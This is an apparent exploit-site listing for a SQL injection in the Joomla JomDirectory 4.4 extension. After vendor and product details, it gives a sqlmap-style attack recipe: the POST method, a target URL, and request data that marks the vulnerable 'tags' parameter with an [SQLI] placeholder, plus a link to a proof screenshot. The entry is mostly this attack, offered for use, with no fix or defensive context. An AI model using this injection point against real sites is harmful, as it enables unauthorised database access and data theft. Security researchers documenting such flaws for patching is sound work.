Joomla JomDirectory 4.4 SQL Injection Vulnerability

2018-01-02T00:00:00
ID 1337DAY-ID-29350
Type zdt
Reporter Bilal Kardadou
Modified 2018-01-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ################################################
#Title: Joomla JomDirectory 4.4 - SQL Injection
#Credit: Bilal KARDADOU
#Vendor: http://comdev.eu/jomdirectory/
#URL: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/jomdirectory/
#Product: 'Joomla JomDirectory 4.4'
#Developer: Comdev
#Extension type: Plugin
#Last updated: Oct 29 2017 
#Compatibility: 3.X
#Type: Paid download
#Google Dork: N/A
################################################
#
#  Description:
#   Building your own business directory site is now easy and quick! Increase user experience of your business directory website with the most versatile extension #                  that smoothly integrates with Joomla.
#
# --Method=POST -p [tags]
#
#  -u "http://127.0.0.1/joomla/index.php?option=com_jomcomdev&task=maps.items&format=json&extension=com_jomdirectory&limit=100"
#  
#    --data="address-lat-lng=&distance=25&latitude=&longitude=&tags=[SQLI]&search=&categories_id=134&favorites=0&featured=0&93a3a2bbe8ed22d8e8e8584b39cc1834=1&"
# PoC:
#  https://prnt.sc/hurom8
#
# Momo Martin Machi rajel Tetouani 7a9ir 
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

#  0day.today [2018-04-14]  #